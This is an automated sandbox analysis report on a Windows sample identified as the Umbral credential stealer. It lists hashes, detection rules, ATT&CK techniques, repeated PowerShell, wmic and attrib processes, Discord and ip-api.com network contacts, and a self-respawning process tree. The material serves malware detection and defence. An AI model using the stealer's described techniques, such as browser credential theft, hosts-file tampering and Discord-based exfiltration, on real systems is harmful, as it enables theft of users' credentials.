umbral | 1eac7f1debb3f6c96260977b111028ae3dcf2d7907e1a2c916044c3942e9e05d

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
16-08-2024 19:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LOADER.exe
Size

15.5MB
MD5

5f62b2a17cda80f8ef9bf521fde17e42
SHA1

5086572ec9aa37b50590a36300b374160d8ffacb
SHA256

1eac7f1debb3f6c96260977b111028ae3dcf2d7907e1a2c916044c3942e9e05d
SHA512

24e72654fd5fbe2a646d0e9b9ca239852d630de426002f3b7ac56c5a16c12037c1559a6e8420e535fd4fd7865b4f8ec2c5330f83b0781287251a4076d3a0a139
SSDEEP

393216:HV0WnD+wO04M1o4FJO22+j79cC/QWXtsVy5J58mu+F2f3nDNzxg:1dniwO04L4+l+j79H/QW3zFIPpa

Score

10^/10

umbral credential_access discovery execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000700000001e559-16.dat	family_umbral
behavioral2/memory/1420-30-0x000001A9B69D0000-0x000001A9B6A10000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3308	powershell.exe
516	powershell.exe
1536	powershell.exe
4872	powershell.exe
2596	powershell.exe
4472	powershell.exe
3812	powershell.exe
3536	powershell.exe
3712	powershell.exe
1884	powershell.exe
2800	powershell.exe
1036	powershell.exe
1176	powershell.exe
3668	powershell.exe
1872	powershell.exe
3560	powershell.exe
4816	powershell.exe
1812	powershell.exe
1904	powershell.exe
4156	powershell.exe
3296	powershell.exe
4016	powershell.exe
1392	powershell.exe
2496	powershell.exe
4520	powershell.exe
4080	powershell.exe
3716	powershell.exe
2792	powershell.exe
4648	powershell.exe
2524	powershell.exe
3864	powershell.exe
4860	powershell.exe
1004	powershell.exe
1708	powershell.exe
552	powershell.exe
4504	powershell.exe
4224	powershell.exe
4604	powershell.exe
4492	powershell.exe
3052	powershell.exe
1172	powershell.exe
3208	powershell.exe
3920	powershell.exe
60	powershell.exe
4036	powershell.exe
2904	powershell.exe
4600	powershell.exe
1884	powershell.exe
1788	powershell.exe
4676	powershell.exe
4292	powershell.exe
2468	powershell.exe
4860	powershell.exe
4844	powershell.exe
2440	powershell.exe
2800	powershell.exe
3296	powershell.exe
4396	powershell.exe
4156	powershell.exe
4072	powershell.exe
916	powershell.exe
3592	powershell.exe
2640	powershell.exe
5004	powershell.exe

Drops file in Drivers directory 19 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 60 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	LOADER.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	loader.exe

Executes dropped EXE 64 IoCs

pid	Process
4384	loaderexp.exe
1420	Umbral.exe
4464	loaderexp.exe
4260	Umbral.exe
3244	loaderexp.exe
4980	Umbral.exe
2988	loaderexp.exe
4220	Umbral.exe
3536	loaderexp.exe
4684	Umbral.exe
1972	loaderexp.exe
4280	Umbral.exe
3628	loaderexp.exe
1936	Umbral.exe
2416	loaderexp.exe
1172	Umbral.exe
2988	loaderexp.exe
4884	Umbral.exe
4692	loaderexp.exe
1220	Umbral.exe
2008	loaderexp.exe
884	Umbral.exe
1788	loaderexp.exe
3308	Umbral.exe
2836	loaderexp.exe
3808	Umbral.exe
5056	loaderexp.exe
4300	Umbral.exe
452	loaderexp.exe
3772	Umbral.exe
4888	loaderexp.exe
552	Umbral.exe
1224	loaderexp.exe
2008	Umbral.exe
3624	loaderexp.exe
452	Umbral.exe
3512	loaderexp.exe
216	Umbral.exe
2572	loaderexp.exe
5060	Umbral.exe
3244	loaderexp.exe
4924	Umbral.exe
3952	loaderexp.exe
4388	Umbral.exe
3272	loaderexp.exe
4968	Umbral.exe
2656	loaderexp.exe
4276	Umbral.exe
1788	loaderexp.exe
2928	Umbral.exe
4444	loaderexp.exe
916	Umbral.exe
4368	loaderexp.exe
1452	Umbral.exe
552	loaderexp.exe
1196	Umbral.exe
2244	loaderexp.exe
4072	Umbral.exe
4296	loaderexp.exe
4020	Umbral.exe
1464	loaderexp.exe
5052	Umbral.exe
1584	loaderexp.exe
5048	Umbral.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 38 IoCs

Web Service

T1102

flow	ioc
160	discord.com
57	discord.com
182	discord.com
159	discord.com
167	discord.com
174	discord.com
27	discord.com
91	discord.com
103	discord.com
114	discord.com
128	discord.com
188	discord.com
195	discord.com
42	discord.com
121	discord.com
129	discord.com
175	discord.com
189	discord.com
181	discord.com
50	discord.com
76	discord.com
84	discord.com
113	discord.com
138	discord.com
196	discord.com
77	discord.com
92	discord.com
137	discord.com
152	discord.com
166	discord.com
41	discord.com
49	discord.com
153	discord.com
28	discord.com
56	discord.com
85	discord.com
104	discord.com
120	discord.com

Looks up external IP address via web service 19 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ip-api.com
81	ip-api.com
88	ip-api.com
117	ip-api.com
125	ip-api.com
23	ip-api.com
46	ip-api.com
110	ip-api.com
156	ip-api.com
72	ip-api.com
95	ip-api.com
141	ip-api.com
171	ip-api.com
185	ip-api.com
53	ip-api.com
134	ip-api.com
163	ip-api.com
178	ip-api.com
192	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 38 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5116	cmd.exe
2024	PING.EXE
4036	cmd.exe
1172	cmd.exe
1688	PING.EXE
3056	PING.EXE
3240	PING.EXE
3236	cmd.exe
4112	PING.EXE
4128	cmd.exe
2424	cmd.exe
1012	cmd.exe
3908	cmd.exe
1464	PING.EXE
2504	PING.EXE
5056	cmd.exe
1028	PING.EXE
1904	PING.EXE
3216	cmd.exe
4504	PING.EXE
4376	cmd.exe
724	PING.EXE
2440	cmd.exe
2800	PING.EXE
3100	cmd.exe
2456	cmd.exe
3260	cmd.exe
4420	PING.EXE
4084	cmd.exe
3220	cmd.exe
3204	PING.EXE
1748	PING.EXE
4564	PING.EXE
2416	cmd.exe
4532	PING.EXE
2532	PING.EXE
2196	PING.EXE
3252	cmd.exe

Detects videocard installed 1 TTPs 19 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2604	wmic.exe
1464	wmic.exe
2196	wmic.exe
2928	wmic.exe
3288	wmic.exe
1052	wmic.exe
4472	wmic.exe
2828	wmic.exe
3296	wmic.exe
2464	wmic.exe
1980	wmic.exe
3808	wmic.exe
3740	wmic.exe
4884	wmic.exe
2904	wmic.exe
4272	wmic.exe
1648	wmic.exe
3816	wmic.exe
3288	wmic.exe

Runs ping.exe 1 TTPs 19 IoCs

Remote System Discovery

T1018

pid	Process
4420	PING.EXE
2196	PING.EXE
2024	PING.EXE
1748	PING.EXE
4564	PING.EXE
2800	PING.EXE
4532	PING.EXE
2532	PING.EXE
3204	PING.EXE
1904	PING.EXE
1688	PING.EXE
3056	PING.EXE
2504	PING.EXE
4504	PING.EXE
3240	PING.EXE
4112	PING.EXE
1464	PING.EXE
724	PING.EXE
1028	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1420	Umbral.exe
4104	powershell.exe
4104	powershell.exe
1176	powershell.exe
1176	powershell.exe
3308	powershell.exe
3308	powershell.exe
4296	powershell.exe
4296	powershell.exe
2792	powershell.exe
2792	powershell.exe
4220	Umbral.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe
4520	powershell.exe
4520	powershell.exe
4520	powershell.exe
4592	powershell.exe
4592	powershell.exe
4592	powershell.exe
1812	powershell.exe
1812	powershell.exe
1936	Umbral.exe
3320	powershell.exe
3320	powershell.exe
3320	powershell.exe
4080	powershell.exe
4080	powershell.exe
4080	powershell.exe
1904	powershell.exe
1904	powershell.exe
1904	powershell.exe
3256	powershell.exe
3256	powershell.exe
3256	powershell.exe
2440	powershell.exe
2440	powershell.exe
2440	powershell.exe
1220	Umbral.exe
1220	Umbral.exe
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
4872	powershell.exe
4872	powershell.exe
4872	powershell.exe
4036	powershell.exe
4036	powershell.exe
4036	powershell.exe
4272	powershell.exe
4272	powershell.exe
4272	powershell.exe
2904	powershell.exe
2904	powershell.exe
2904	powershell.exe
4300	Umbral.exe
4300	Umbral.exe
3324	powershell.exe
3324	powershell.exe
3324	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1420	Umbral.exe
Token: SeIncreaseQuotaPrivilege	4880	wmic.exe
Token: SeSecurityPrivilege	4880	wmic.exe
Token: SeTakeOwnershipPrivilege	4880	wmic.exe
Token: SeLoadDriverPrivilege	4880	wmic.exe
Token: SeSystemProfilePrivilege	4880	wmic.exe
Token: SeSystemtimePrivilege	4880	wmic.exe
Token: SeProfSingleProcessPrivilege	4880	wmic.exe
Token: SeIncBasePriorityPrivilege	4880	wmic.exe
Token: SeCreatePagefilePrivilege	4880	wmic.exe
Token: SeBackupPrivilege	4880	wmic.exe
Token: SeRestorePrivilege	4880	wmic.exe
Token: SeShutdownPrivilege	4880	wmic.exe
Token: SeDebugPrivilege	4880	wmic.exe
Token: SeSystemEnvironmentPrivilege	4880	wmic.exe
Token: SeRemoteShutdownPrivilege	4880	wmic.exe
Token: SeUndockPrivilege	4880	wmic.exe
Token: SeManageVolumePrivilege	4880	wmic.exe
Token: 33	4880	wmic.exe
Token: 34	4880	wmic.exe
Token: 35	4880	wmic.exe
Token: 36	4880	wmic.exe
Token: SeIncreaseQuotaPrivilege	4880	wmic.exe
Token: SeSecurityPrivilege	4880	wmic.exe
Token: SeTakeOwnershipPrivilege	4880	wmic.exe
Token: SeLoadDriverPrivilege	4880	wmic.exe
Token: SeSystemProfilePrivilege	4880	wmic.exe
Token: SeSystemtimePrivilege	4880	wmic.exe
Token: SeProfSingleProcessPrivilege	4880	wmic.exe
Token: SeIncBasePriorityPrivilege	4880	wmic.exe
Token: SeCreatePagefilePrivilege	4880	wmic.exe
Token: SeBackupPrivilege	4880	wmic.exe
Token: SeRestorePrivilege	4880	wmic.exe
Token: SeShutdownPrivilege	4880	wmic.exe
Token: SeDebugPrivilege	4880	wmic.exe
Token: SeSystemEnvironmentPrivilege	4880	wmic.exe
Token: SeRemoteShutdownPrivilege	4880	wmic.exe
Token: SeUndockPrivilege	4880	wmic.exe
Token: SeManageVolumePrivilege	4880	wmic.exe
Token: 33	4880	wmic.exe
Token: 34	4880	wmic.exe
Token: 35	4880	wmic.exe
Token: 36	4880	wmic.exe
Token: SeDebugPrivilege	4104	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	4296	powershell.exe
Token: SeIncreaseQuotaPrivilege	4676	wmic.exe
Token: SeSecurityPrivilege	4676	wmic.exe
Token: SeTakeOwnershipPrivilege	4676	wmic.exe
Token: SeLoadDriverPrivilege	4676	wmic.exe
Token: SeSystemProfilePrivilege	4676	wmic.exe
Token: SeSystemtimePrivilege	4676	wmic.exe
Token: SeProfSingleProcessPrivilege	4676	wmic.exe
Token: SeIncBasePriorityPrivilege	4676	wmic.exe
Token: SeCreatePagefilePrivilege	4676	wmic.exe
Token: SeBackupPrivilege	4676	wmic.exe
Token: SeRestorePrivilege	4676	wmic.exe
Token: SeShutdownPrivilege	4676	wmic.exe
Token: SeDebugPrivilege	4676	wmic.exe
Token: SeSystemEnvironmentPrivilege	4676	wmic.exe
Token: SeRemoteShutdownPrivilege	4676	wmic.exe
Token: SeUndockPrivilege	4676	wmic.exe
Token: SeManageVolumePrivilege	4676	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4020 wrote to memory of 1708	4020	LOADER.exe	89
PID 4020 wrote to memory of 1708	4020	LOADER.exe	89
PID 4020 wrote to memory of 4384	4020	LOADER.exe	90
PID 4020 wrote to memory of 4384	4020	LOADER.exe	90
PID 4020 wrote to memory of 1420	4020	LOADER.exe	91
PID 4020 wrote to memory of 1420	4020	LOADER.exe	91
PID 1420 wrote to memory of 4880	1420	Umbral.exe	94
PID 1420 wrote to memory of 4880	1420	Umbral.exe	94
PID 1708 wrote to memory of 4056	1708	loader.exe	96
PID 1708 wrote to memory of 4056	1708	loader.exe	96
PID 1708 wrote to memory of 4464	1708	loader.exe	97
PID 1708 wrote to memory of 4464	1708	loader.exe	97
PID 1708 wrote to memory of 4260	1708	loader.exe	98
PID 1708 wrote to memory of 4260	1708	loader.exe	98
PID 1420 wrote to memory of 3100	1420	Umbral.exe	99
PID 1420 wrote to memory of 3100	1420	Umbral.exe	99
PID 1420 wrote to memory of 4104	1420	Umbral.exe	101
PID 1420 wrote to memory of 4104	1420	Umbral.exe	101
PID 1420 wrote to memory of 1176	1420	Umbral.exe	103
PID 1420 wrote to memory of 1176	1420	Umbral.exe	103
PID 1420 wrote to memory of 3308	1420	Umbral.exe	106
PID 1420 wrote to memory of 3308	1420	Umbral.exe	106
PID 1420 wrote to memory of 4296	1420	Umbral.exe	108
PID 1420 wrote to memory of 4296	1420	Umbral.exe	108
PID 4056 wrote to memory of 4080	4056	loader.exe	110
PID 4056 wrote to memory of 4080	4056	loader.exe	110
PID 4056 wrote to memory of 3244	4056	loader.exe	111
PID 4056 wrote to memory of 3244	4056	loader.exe	111
PID 1420 wrote to memory of 4676	1420	Umbral.exe	112
PID 1420 wrote to memory of 4676	1420	Umbral.exe	112
PID 4056 wrote to memory of 4980	4056	loader.exe	114
PID 4056 wrote to memory of 4980	4056	loader.exe	114
PID 1420 wrote to memory of 4556	1420	Umbral.exe	115
PID 1420 wrote to memory of 4556	1420	Umbral.exe	115
PID 1420 wrote to memory of 3864	1420	Umbral.exe	117
PID 1420 wrote to memory of 3864	1420	Umbral.exe	117
PID 1420 wrote to memory of 2792	1420	Umbral.exe	119
PID 1420 wrote to memory of 2792	1420	Umbral.exe	119
PID 1420 wrote to memory of 2828	1420	Umbral.exe	121
PID 1420 wrote to memory of 2828	1420	Umbral.exe	121
PID 1420 wrote to memory of 5116	1420	Umbral.exe	125
PID 1420 wrote to memory of 5116	1420	Umbral.exe	125
PID 5116 wrote to memory of 2800	5116	cmd.exe	127
PID 5116 wrote to memory of 2800	5116	cmd.exe	127
PID 4080 wrote to memory of 4396	4080	loader.exe	128
PID 4080 wrote to memory of 4396	4080	loader.exe	128
PID 4080 wrote to memory of 2988	4080	loader.exe	129
PID 4080 wrote to memory of 2988	4080	loader.exe	129
PID 4080 wrote to memory of 4220	4080	loader.exe	130
PID 4080 wrote to memory of 4220	4080	loader.exe	130
PID 4220 wrote to memory of 916	4220	Umbral.exe	131
PID 4220 wrote to memory of 916	4220	Umbral.exe	131
PID 4220 wrote to memory of 4984	4220	Umbral.exe	133
PID 4220 wrote to memory of 4984	4220	Umbral.exe	133
PID 4220 wrote to memory of 3592	4220	Umbral.exe	135
PID 4220 wrote to memory of 3592	4220	Umbral.exe	135
PID 4220 wrote to memory of 4492	4220	Umbral.exe	137
PID 4220 wrote to memory of 4492	4220	Umbral.exe	137
PID 4220 wrote to memory of 4520	4220	Umbral.exe	139
PID 4220 wrote to memory of 4520	4220	Umbral.exe	139
PID 4396 wrote to memory of 1704	4396	loader.exe	141
PID 4396 wrote to memory of 1704	4396	loader.exe	141
PID 4396 wrote to memory of 3536	4396	loader.exe	142
PID 4396 wrote to memory of 3536	4396	loader.exe	142

Views/modifies file attributes 1 TTPs 19 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4984	attrib.exe
724	attrib.exe
2504	attrib.exe
4256	attrib.exe
3516	attrib.exe
4016	attrib.exe
4964	attrib.exe
3100	attrib.exe
4168	attrib.exe
2244	attrib.exe
3816	attrib.exe
3452	attrib.exe
2928	attrib.exe
2212	attrib.exe
628	attrib.exe
4744	attrib.exe
4676	attrib.exe
4676	attrib.exe
3052	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LOADER.exe
"C:\Users\Admin\AppData\Local\Temp\LOADER.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4020
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1708
- - C:\Users\Admin\AppData\Local\Temp\loader.exe
    "C:\Users\Admin\AppData\Local\Temp\loader.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Users\Admin\AppData\Local\Temp\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4080
    - - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        5⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:4396
      - C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        6⤵
        Checks computer location settings
        
        PID:1704
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        7⤵
        Checks computer location settings
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        8⤵
        Checks computer location settings
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        9⤵
        Checks computer location settings
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        10⤵
        Checks computer location settings
        
        PID:1168
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        11⤵
        Checks computer location settings
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        12⤵
        Checks computer location settings
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        13⤵
        Checks computer location settings
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        14⤵
        Checks computer location settings
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        15⤵
        Checks computer location settings
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        16⤵
        Checks computer location settings
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        17⤵
        Checks computer location settings
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        18⤵
        Checks computer location settings
        
        PID:3864
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        19⤵
        Checks computer location settings
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        20⤵
        Checks computer location settings
        
        PID:2988
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        21⤵
        Checks computer location settings
        
        PID:3236
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        22⤵
        Checks computer location settings
        
        PID:1004
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        23⤵
        Checks computer location settings
        
